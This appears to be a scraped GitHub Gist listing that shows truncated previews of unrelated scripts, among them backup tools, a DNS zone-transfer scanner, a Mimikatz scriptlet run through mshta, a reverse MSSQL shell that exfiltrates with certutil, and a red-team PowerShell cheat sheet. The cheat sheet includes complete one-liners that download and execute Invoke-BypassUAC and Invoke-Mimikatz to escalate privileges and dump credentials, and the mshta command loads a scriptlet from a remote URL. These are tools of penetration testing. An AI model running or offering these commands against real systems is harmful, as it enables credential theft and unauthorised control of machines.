This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #define XLIM 17 | |
| #define YLIM 9 | |
| #define ARSZ (XLIM * YLIM) | |
| #define DEBUG 0 |
fxsjy
/ SimpleAuthServer.py
Created
April 26, 2013 06:23
SimpleAuthServer: A SimpleHTTPServer with authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import BaseHTTPServer | |
| from SimpleHTTPServer import SimpleHTTPRequestHandler | |
| import sys | |
| import base64 | |
| key = "" | |
| class AuthHandler(SimpleHTTPRequestHandler): | |
| ''' Main class to present webpages and authentication. ''' | |
| def do_HEAD(self): |
VGostyuzhov
/ scan-axfr.py
Last active
November 5, 2021 09:34
This script checks bunch of domains for DNS Zone Transfer vulnerability. Usage: python dns_axfr.py domains.txt where 'domains.txt' file with list of domains to scan. Requirements: pip install dnspython,termcolor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import dns.resolver | |
| import dns.query | |
| import dns.zone | |
| import csv | |
| from termcolor import colored | |
| from pprint import pprint | |
| resolver = dns.resolver.Resolver() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # NextCloud to Amazon S3 Backup Script | |
| # Author: Autoize (autoize.com) | |
| # This script creates an incremental backup of your NextCloud instance to Amazon S3. | |
| # Amazon S3 is a highly redundant block storage service with versioning and lifecycle management features. | |
| # Requirements | |
| # - Amazon AWS Account and IAM User with AmazonS3FullAccess privilege |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # NextCloud to BackBlaze B2 Backup Script | |
| # Author: Autoize (autoize.com) | |
| # This script creates an incremental backup of your NextCloud instance at BackBlaze's off-site location. | |
| # BackBlaze B2 is an object storage service that is much less expensive than using Amazon S3 for the same purpose, with similar versioning and lifecycle management features. | |
| # Uploads are free, and storage costs only $0.005/GB/month compared to S3's $0.022/GB/month. | |
| # Requirements |
vector-sec
/ mimikatz.sct
Created
January 18, 2018 14:15
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
joec4i
/ socat with timeout
Created
September 27, 2019 05:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| socat -t5 -T5 - TCP-LISTEN:8888,fork,reuseaddr |
OlderNewer